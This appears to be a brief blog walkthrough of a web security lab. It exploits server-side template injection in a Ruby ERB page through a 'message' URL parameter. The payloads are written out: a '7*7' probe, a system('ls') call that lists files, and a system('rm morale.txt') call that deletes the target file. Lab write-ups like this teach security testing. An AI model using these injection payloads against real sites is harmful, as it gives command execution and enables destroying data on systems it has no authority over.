When click “View details” of the first product, we got a message:
![](https://niekdang.wordpress.com/wp-content/uploads/2020/11/image.png?w=1024)
This message is a parameter named “message
” of a GET method request.
Because this lab uses an ERB template, we will try to change the “message
” parameter into:
?message=<%= 7*7 %>
Hence this site have a SSTI vulnerability.
![](https://niekdang.wordpress.com/wp-content/uploads/2020/11/image-2.png?w=283)
To run system commands from ruby, we use function system()
. We use payload:
?message=<%= system("ls") %>
to list the files and we found the target file “morale.txt
“.
![](https://niekdang.wordpress.com/wp-content/uploads/2020/11/image-3.png?w=281)
Then we delete that file with payload:
?message=<%= system("rm morale.txt") %>
![](https://niekdang.wordpress.com/wp-content/uploads/2020/11/image-5.png?w=1024)